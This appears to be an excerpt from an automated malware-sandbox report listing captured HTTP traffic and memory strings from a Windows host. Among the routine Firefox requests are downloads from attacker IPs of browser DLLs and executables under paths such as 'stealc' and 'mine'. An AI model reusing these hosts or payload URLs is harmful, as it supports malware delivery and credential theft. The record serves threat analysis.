Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/e93e520a-00b4-412f-b6c9-5558d2fce1c6 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/61cebe57-eeee-464e-9b2c-ac2e19541b6b HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/bf20afe9-a58a-41e9-8cac-041eef83a1b3 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/8bc91d67-1d3d-4cd1-89f0-094c92ed8df4 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/894f51cb-fd5b-43cb-a050-43bd1fdc5ee6 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/b2e034e0-00ba-4630-9778-300fed6bde65 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/buckets/main/collections/devtools-compatibility-browsers/changeset?_expected=1721884805468&_since=%221694439985514%22 HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/jsonConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/7925cb6e-d44b-4094-a90f-28c0a426e872 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/b349a8f0-8f97-4587-92f0-a94aad66a9a4.png HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/a9a59e5d-077d-4df7-9757-dc9b0bf1ba19.png HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fimg.pastemagazine.com%2Fwp-content%2Fjuploads%2F2024%2F07%2Folympicbeds.jpg HTTP/1.1Host: img-getpocket.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: image/avif,image/webp,/Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brOrigin: nullConnection: keep-aliveSec-Fetch-Dest: imageSec-Fetch-Mode: corsSec-Fetch-Site: cross-site
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/1e666eb4-786d-4385-87e0-ba83ce528905.png HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/3eb97e9a-d15e-4467-bbd9-814e0a8aff0b.svg HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/c531d3ca-db81-4c48-83c3-8e9b586df0e2.jpg HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/buckets/main/collections/translations-models/changeset?_expected=1721853459238&_since=%221692284142841%22 HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/jsonConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/08c97d2d-b184-4f7c-8d26-38ec2e567a70.json HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/sqlite3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/freebl3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/mozglue.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/msvcp140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/nss3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/softokn3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/vcruntime140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/enter.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /cost/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache

Source: places.sqlite.33.dr	String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AdF4I74t81MIc57ZWbsnEHjOAL5XOxc5V6997UX_MR6Qs_U3Wxrin9CV5DYxb5Lh9RkCjVILOmyLbgmoc.elgoog.stnuocca. equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3216406927.0000016DE49BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AdF4I76O59q3kZuVkEikshcjAqxUN8FNn3aweiPynOeRPtNl-mQkf3AYfHIp2ju47tXoxYdAUO-imoc.elgoog.stnuocca. equals www.youtube.com (Youtube)
Source: places.sqlite.33.dr	String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=enmoc.elgoog.stnuocca. equals www.youtube.com (Youtube)
Source: places.sqlite.33.dr	String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AdF4I74gVc5v2Cb6G5cvkcN8YiZOQIWdfcHUNib3P-Isq_4QdJyamQMDLmpjXPVV783jpnO9RSm_JA&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1155665976%3A1722017438793381&ddm=0YouTubemoc.elgoog.stnuocca. equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3216406927.0000016DE49BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AdF4I77EVwBCWklE9qIBneDMIiwFWCCFTErG2FyxHopmLBm9ld0zmag6hfnN6yKuG81xlYfRS6YoZQ&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1379105066%3A1722017451321129&ddm=0moc.elgoog.stnuocca.( equals www.youtube.com (Youtube)
Source: WebAssistDatabase.35.dr	String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB&ifkv=AdF4I75aNkmYhtF_MmgmHjGWmp0oL3UvNytgZNbpUtsHuVRyXxpuwTtrRtVZa0mplhYWnP6By8Z9Ww&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1357171065%3A1722017418669557&ddm=0 equals www.youtube.com (Youtube)
Source: places.sqlite.33.dr	String found in binary or memory: https://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3216406927.0000016DE49BF000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr	String found in binary or memory: https://www.youtube.com/accountmoc.ebutuoy.www. equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2773519559.00000291F3940000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: firefox.exe, 00000020.00000002.2795766765.00000260EA7D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation equals www.youtube.com (Youtube)
Source: load_statistics.db-wal.35.dr	String found in binary or memory: +www.youtube.com equals www.youtube.com (Youtube)
Source: load_statistics.db-wal.35.dr	String found in binary or memory: +www.youtube.com equals www.youtube.com (Youtube)
Source: load_statistics.db-wal.35.dr	String found in binary or memory: +www.youtube.comwww.youtube.com equals www.youtube.com (Youtube)
Source: load_statistics.db-wal.35.dr	String found in binary or memory: +3www.youtube.comaccounts.google.com equals www.youtube.com (Youtube)
Source: load_statistics.db-wal.35.dr	String found in binary or memory: +Mwww.youtube.com\ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3217482927.0000016DE07AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: .S........[tlsflags0x00000000]www.youtube.com:443 <ROUTE-via www.youtube.com:443> {NPN-TOKEN h3}^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3204782382.0000016DE9E4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: /ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE66DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3160209289.0000016DE67A0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3221850152.0000016DE67A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE66DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216728852.0000016DE496D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3160209289.0000016DE67A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE66DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2986300787.0000016DDF285000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2970407421.0000016DDF285000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000003.2737509112.00000291F395E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2750122014.00000291F396F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2773519559.00000291F3970000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 8p8https://www.youtube.com/account --attempting-deelevationUser equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3215505857.0000016DE4B6A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE66DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8www.youtube.com^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: :https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AdF4I74t81MIc57ZWbsnEHjOAL5XOxc5V6997UX_MR6Qs_U3Wxrin9CV5DYxb5Lh9RkCjVILOmyLbg equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: :https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: :https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AdF4I74gVc5v2Cb6G5cvkcN8YiZOQIWdfcHUNib3P-Isq_4QdJyamQMDLmpjXPVV783jpnO9RSm_JA&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1155665976%3A1722017438793381&ddm=0 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.3282835116.00000221E1E30000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3282362582.0000022B012E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.2794491755.0000016DCE8FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowsq equals www.youtube.com (Youtube)
